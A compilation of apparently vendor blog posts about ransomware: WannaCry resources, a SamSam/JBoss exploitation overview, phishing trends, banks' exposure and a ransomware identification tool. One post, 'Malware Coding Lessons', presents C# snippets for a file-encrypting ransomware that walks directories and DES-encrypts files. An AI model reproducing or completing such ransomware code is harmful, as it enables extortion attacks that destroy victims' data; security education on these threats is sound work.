Planet Ransomware

Planet Ransomware

If you were expecting a quiet Friday in terms of cyberattacks, this ain’t it. There are reports of a massive ransomware attack affecting computers on a global scale: in the UK, Spain, Russia, Ukraine, Japan, and Taiwan.

The ransomware variant that’s doing the damage is called WCry, also known as WannaCry or WanaCrypt0r. It has so far claimed some high-profile targets, including NHS hospitals in the UK, and telecom and banking companies in Spain.

Be calm and carry on, of course.

In the blog, we’ve been writing about ransomware over the last two years, and we have great educational resources to help you prevent or reduce the damage of an attack.

Here’s a quick overview of our content.

What is it?

Our ransomware guide: https://www.varonis.com/blog/the-complete-ransomware-guide/ 

Learning more

The Troy Hunt course: https://www.varonis.com/blog/introduction-to-ransomware-course/

How it spreads

Yes, it can have worm-like features: https://www.varonis.com/blog/next-gen-ransomware-ransomworm-gets-deadlier/

Can I make my own (for research purposes)?

Yes, but only under adult supervision:



Reducing the risk

Limiting file access really, really helps: https://www.varonis.com/blog/the-best-ransomware-defense-dont-have-files/

Legal and Regulatory Implications

For US companies, this is what you need to know: https://www.varonis.com/blog/ransomware-the-legal-cheat-sheet-for-breach-notification/

Should you pay?

It depends:



Is a decryption solution available?

Check here: https://www.varonis.com/ransomware-identifier/

The ultimate answer to ransomware

User Behavior Analytics (UBA): https://www.varonis.com/blog/why-uba-will-catch-the-zero-day-ransomware-attacks-that-endpoint-protection-cant/

And here’s proof:  https://www.varonis.com/ransomware-solutions




Malware Coding Lessons for IT People, Part II: Fun With FUD Ransomware!

Malware Coding Lessons for IT People, Part II: Fun With FUD Ransomware!

This article is part of the series "Malware Coding Lessons for IT People". Check out the rest:

Let’s not overthink ransomware! It’s just a small malicious piece of code with one devious goal — encrypting all of the user’s important files. It the unfortunate victim wants to recover them he or she will have to pay a hefty amount to retrieve the decryption key.

How hard is ransomware?

In this post, I’ll show you how incredibly easy it is to code a FUD (Fully Undetected) ransomware using public Microsoft libraries with C#.

Ransomware 101

As I discussed in my previous post, there are a few ways to get infected with malware – for starters, malicious attachments, rogue websites, and phishing campaigns, as well as some other creative methods I’ll cover in a future post.

Ok, say we’ve clicked on a malicious ransomware file. What’s going to happen next? Persistency!

Persistency is the code used by hacker to enable the malware to survive restarts and to disguise the software so it would be hard to detect (and remove). While persistency is (usually) generic across many different malware families, there are some unique techniques for ransomware. I’ll get into this in a future post.

At its core, ransomware is just software that performs bulk encryption of the data contents in the victim’s file system. Typically, asymmetric encryption — with different keys for encryption and decryption — is preferred by hackers since it is much harder to recover the data.

This asymmetric algorithm is based on the idea of encrypting the files contents with a public key, but using a different private key that only that attacker has for decryption. You can learn more about asymmetric encryption here: https://en.wikipedia.org/wiki/Public-key_cryptography.

The malware can also choose a weaker encryption method, such as symmetric encryption algorithm, in which the same key is used for both encryption and decryption.

To make the code even simpler, we will use an API that does the symmetric encryption algorithm.

And Now the Code

The next part of the software that newbies need to know about is traversing the file system. Essentially, you’re travelling through the directory hierarchy, collecting file pathname, and then feeding the file contents to the encryption engine. Then of course the file has to be written back.

The list of the files to be encrypted is usually the ones companies are dependent on. We’re talking documents, spreadsheets, images, presentations, audio, and emails. By the way, hackers usually will not encrypt movies due to the size and the impact on the malwares performance. That’s a small consolation—employees can be watching movies while IT is restoring from a backup.

Once the files list is generated after navigating the directories, it’s a good idea to wait for an appropriate time to start the encryption. The idea is to then encrypt as much file contents as possible from the list before being detected.

More sophisticated ransomware will attempt to learn the idle time of the infected computer — when there’s CPU available– and slip in the encryption processing at appropriate times to avoid detection.

Enough talk, here’s the code.

First snippet: Choose a random key to encrypt the data with:

string key = "R?\n??i??";

Basically you can choose any key that you like, remember that we are going to choose symmetric algorithm so the key will be used for encrypting and decrypting as well.

Second snippet:   Encrypt an entire directory contents:

private static void EncryptDir(string d,int mili)
            DirectoryInfo dirtoencrypt = new DirectoryInfo(d);
            FileInfo[] file;
            file = dirtoencrypt.GetFiles();
            foreach (FileInfo currentFile in file)
                if (currentFile.Extension.ToLower() != ".exe")
                    string key = "R?\n??i??";
                    EncryptFile(currentFile.FullName, currentFile.FullName + ".axx", key);


Third Snippet: The encrypting function, taken directly from MSDN (https://support.microsoft.com/en-us/kb/307010)

static void EncryptFile(string sInputFilename, \
static void EncryptFile(string sInputFilename, string sOutputFilename, string sKey)
            FileStream fsInput = new FileStream(sInputFilename,

            FileStream fsEncrypted = new FileStream(sOutputFilename,
            DESCryptoServiceProvider DES = new DESCryptoServiceProvider();
            DES.Key = ASCIIEncoding.ASCII.GetBytes(sKey);
            DES.IV = ASCIIEncoding.ASCII.GetBytes(sKey);
            ICryptoTransform desencrypt = DES.CreateEncryptor();
            CryptoStream cryptostream = new CryptoStream(fsEncrypted,

            byte[] bytearrayinput = new byte[fsInput.Length];
            fsInput.Read(bytearrayinput, 0, bytearrayinput.Length);
            cryptostream.Write(bytearrayinput, 0, bytearrayinput.Length);


That’s it!

A malicious tool with tons of damage potential in less than a 100 lines of code and under 10kb after compiling.

I’ll put together more pieces of the ransomware puzzle in another post.

New SamSam Ransomware Exploiting Old JBoss Vulnerability

New SamSam Ransomware Exploiting Old JBoss Vulnerability

One of the lessons learned from the uptick in ransomware attacks is that it pays to keep your security patches up to date. A few months ago the SamSam/Samas malware was (and is still) having great success primarily against healthcare companies and hospitals.

The attack vector, though, was not based on phishing or social engineering. SamSam instead exploits a very old (and surprising) vulnerability in JBoss, Red Hat’s Java-based web server environment.

No Phishing

JMX is the administrative console web app for JBOSS — yes, everything starts with a J. Unfortunately, by default, the JMX home page is available externally without any authentication checks.

Like any good admin took, JMX gives you access to some basic functions including running Java code.

Are you thinking what I’m thinking?

Hackers discovering this JBoss vulnerability quickly realized that if they could upload a simple shell they were on their way to controlling the server.

And that’s the way this exploit works. If you want to read the technical details and the coding involved, you can google on “jboss vulnerability”.

This is a very well-known security hole – the CVE dates back to 2010—and it has since been patched.

But it has come back into the limelight because the SamsSam ransomware has very successfully used it against healthcare orgs, which for whatever reasons are more likely to have JBoss installations.

Once the cyber thieves gain entry through JMX, they upload the ransomware. And start collecting the fees. No phishing required.

How bad is the problem?

According to Cisco security researchers, there could be as many as 3.2 million installations at risk.

Remote Access Trojan by Any other Name

Attackers can find sites that have JBoss by Google dorking, which allows you to search for part of the telltale URL – in this case “jmx-console”—that indicates a JBoss server on an exposed site.


It’s an admin console! It’s a remote access trojan! It’s both!

In looking at the JBoss attack techniques, I saw lots of code where the JMX interface acts as starting point to uploading and launching other software, say a reverse shell. So the vulnerability leaves open other attacks, not necessarily ransomware.

To put it bluntly, the JMX interface is an unintentional Remote Access Trojan or RAT, which we wrote about in our pen testing series.

Normally the attacker has to first install the RAT, but with these unpatched Red Hat installations it’s there — gasp!— waiting for them.

Maybe it’s a good time now to bring all your systems up to date with the latest security patches — I’m talking to you healthcare orgs!


One Take Away from Black Hat 2016: Designer Ransomware!

One Take Away from Black Hat 2016: Designer Ransomware!

We had an amazing week at Black Hat 2016.  One topic that was on attendees’ minds— besides hacking Jeeps and chip-and-pin technology — was ransomware. A security analysis firm now warns us that ransomware has become more clickable because the thieves are localizing the phish mail.

You should watch the video below for the full interview with an analyst from Sophos.

The key takeaway is that the ransomware designers have learned some marketing tricks from non-criminal enterprises.

These digital bandits know to focus their efforts on richer countries that can afford to pay the ransomware and then customize the email contents using very local companies and brands.

So you may receive a nicely crafted email with the name and logo of, say, a utility company or government agency. The hackers have gotten better at working out the location of the victims based on their IP addresses.

With the attackers improved powers of “market segmentation”, we’re a long way from one-size-fits-all Nigerian 419 schemes!

You and I could easily spot that the sender of the email containing the malware is phony – see our phish mail post — but the average employee might not.

Of course, your company should be boosting employee security budgets to make it less likely that workers will click on an UPS invoice.

More than that, though, companies should lower their overall risk exposure surface. It just makes sense, as Rob has just pointed out, to limit the files that the attacker can access in the first place.

We’ll be talking more about ransomware next week when we present the results of a custom survey that we’re finishing up.



Banks Secretly and Silently Struggling with Ransomware

Banks Secretly and Silently Struggling with Ransomware

“You’re almost certainly not going to hear about successful ransomware attacks on banks,” says Fraud Prevention Expert, Ross Hogan in an interview with Banking Exchange. “It is probably one of the most catastrophic events that a bank could suffer.”


If a financial institution made a public announcement that the firm was infected with ransomware, the brand damage would be irreparable.

Moreover, it could potentially create panic amongst customers, ensuing a bank run. Customers might decide to withdraw cash from a financial institution, destabilizing a bank to where it runs out of cash and unexpectedly face bankruptcy. The result of this scenario would be – from an economic standpoint – catastrophic.

And NO ONE wants this to happen.

But we know financial institutions are a target

How? Ransomware does not discriminate.

All it takes is one phishing click or a wrong installation and your computer or your entire network could take a hit. (Listen to our podcast: Journey of a Ransomware Attack)

“They’re not just trying to infect your workstation and lock your files on you workstation; they’re trying to go for any network drive they can find,” says Editor-in-Chief of Cyberheist Stu Sjouwerman. “That’s where the risk is. This is what happened at Presbyterian Hospital in Hollywood.”

Not only has ransomware infected hospitals, but schools, police departments, and city departments – all institutions that we rely on.

The financial industry took note. Last year, the Federal Financial Institutions Examination Council issued a ransomware warning about the frequency and severity of the threat.

What banks can do

Be proactive and learn how you can protect your organization from the inside out:

How Varonis helps financial services stop and prevent ransomware

We’ve been working with organizations from all verticals to prevent ransomware. And here are a few quotes from a few financial institutions that describe their experience with how Varonis helps them stop and prevent ransomware:

  • “Even though we have a state of the art firewall and new antivirus software, neither was able to detect or stop Crypto. Varonis DatAlert not only sent us email alerts when a user got hit by Crypto, but also logged that user out before the virus could do any damage to network shares. That alone justified its cost.” – Southern California Wealth Management Firm
  • “Our endpoint protection had detected the virus on a computer and had appropriately removed the code, but not before it had kicked off the encryption process. The point to note here is that although the endpoint had isolated the problem it wasn’t able to kill the process. Varonis was able to identify the process and then remediate the issue and we can prevent it from happening again.” – A Northwestern Bank
  • “ Of all the expensive security products we’ve purchased, DatAlert is the only solution that has done, and is doing, all of the alerting and notification of anomalous behavior, especially ransomware. ” – A Major Bank in Western Canada



How to Identify Ransomware: Use Our New Identification Tool

How to Identify Ransomware: Use Our New Identification Tool

Sadly, ransomware infections are routine enough that IT departments have started to develop standardized procedures for rapidly quarantining infected machines, determining the extent of damage and then attempting recovery operations..

For help with locking off computers performing suspicious actions (like modifying thousands of files in a minute), our DatAlert customers are using custom rules and scripts tied to behaviors. They’re running reports in DatAdvantage to rapidly find exactly which files were touched on which servers. However, until recently Varonis has been unable to help with recovery efforts.

While restoring files from backup is the best recovery option, often you’re still left with files which were created since the last backup was taken or in cases where the infection wasn’t promptly caught: where the files encrypted by the ransomware themselves were backed up.

If you’re in this situation, you need to:

    1. Identify the strain of ransomware you’ve been hit with.
    2. Locate an unlocking application (if any) for that strain.

To help with both of these recovery tasks, we’ve created a Ransomware Identifier. Enter either the file extension of the ransomware encrypted files, or the name of the ransom note file into the Ransomware Identifier search engine and rapidly get your answers.

Try the Ransomware Identifier Now